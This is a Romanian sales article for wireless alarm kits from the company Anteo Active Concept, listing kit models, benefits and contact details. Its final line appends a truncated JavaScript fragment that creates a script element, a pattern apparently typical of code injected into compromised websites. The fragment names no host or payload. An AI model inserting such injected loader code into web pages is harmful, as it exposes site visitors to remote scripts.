kituri alarma wireless

kituri alarma wireless

Ai grija de locuinta ta! Ca sa nu stai cu grija cand mergi in delegatii sau concediu, firma Anteo Active Concept iti recomanda kituri alarma wireless. Acestea sunt perfect de folosit, de altfel, si pentru sedii de birouri. Montezi unul si iti vezi de drum!

Kituri alarma wireless – Informatii pentru clienti

Din cauza numarului din ce in ce mai mare de infractiuni, trebuie sa-ti iei masuri suplimentare de protectie. Indiferent ca ai sau nu bunuri foarte valoroase in locuinta, iti trebuie ceva care sa faca fata hotilor. Ce zici de niste kituri alarma wireless ? Sunt eficiente si ii tin cu adevarat la distanta pe raufacatori. De unde sa le cumperi? Noi iti recomandam oferta firmei Anteo Active Concept.

Poti achizitiona unul in functie de pret si cerinte. Cel mai ieftin, spre exemplu, este kitul cu comunicator GSM/GPRS – Satel MICRA-Basic. E format din urmatoarele piese: centrala alarma hibrid, o antena GSM/GPRS, tastatura LED wireless, sirena de exterior cu acumulator, carcasa din plastic cu transformator 18V/40A si un acumulator. Ca sa il montezi nu trebuie decat sa urmezi instructiunile de pe CD-ul care iti este livrat odata cu kitul.

La polul opus se afla kitul Texecom Ricochet 48W. E caracterizat de urmatoarele aspecte:

– in pachet sunt incluse, printre altele, senzor de miscare si senzor de vibratii/soc;

– este o tehnologie wireless bazata pe noduri de retea, datorita carora este extinsa aria de acoperire si nu numai;

– Texecom este cel mai mare producator independent de pe continentul nostru in ceea ce priveste sistemele de detectie efractie, avand o experienta de 25 de ani.

Avantaje utilizare kituri alarma wireless

De ce sa comanzi un produs din categoria kituri alarma wireless, din oferta firmei Anteo Active Concept? Iata cateva motive:

– protejeaza cladiri de dimensiuni mai mici, cum ar fi locuinta, casa de vacanta, garajul, atelierul si biroul;

– pot fi utilizate pentru unitati comerciale de dimensiuni mai mari, intrucat se realizeaza chiar si o notificare la distanta, prin GSM/GPRS, bineinteles daca e necesar;

– nu necesita timp indelungat de instalare;

– utilizarea componentelor este foarte usoara;

– beneficiezi de o garantie de 24 luni.

Anteo Active Concept – Furnizor de kituri alarma wireless

Firma Anteo Active Concept comercializeaza o gama variata de sisteme de securitate si asigura, la cerere, servicii conexe, prin intermediul contractelor cu firme partenere (acestea se ocupa cu proiectarea, montarea si mentenanta sistemelor). Cu alte cuvinte, furnizeaza solutii complete in domeniu.

In oferta, produsele sunt organizate in urmatoarele categorii: alarma antiefractie, produse pentru supraveghere video, interfoane, alarme incendiu, automatizari, control acces si garduri electrice.

De ce sa cumperi de la Anteo Active Concept? In afara de aspectele mentionate pana acum, trebuie spus ca echipamentele provin de la nume importante in domeniu, precum: Electra, Beninca, Q-See, DSC, Rosslare, Commax si nu numai.

Alege o metoda ingenioasa sa-ti protejezi bunurile! Comanda kituri alarma wireless din oferta Anteo Active Concept si bucura-te de siguranta pe care ti-o ofera. Pachetele sunt insotite de CD de instalare, astfel incat sa nu pierzi mult timp cu montarea pieselor.

Date de contact

Adresa: Pitesti, str. Zimbrului, nr. 7

Telefon: 0745.089.610, 0771.416.253var d=document;var s=d.createElement(‘script’);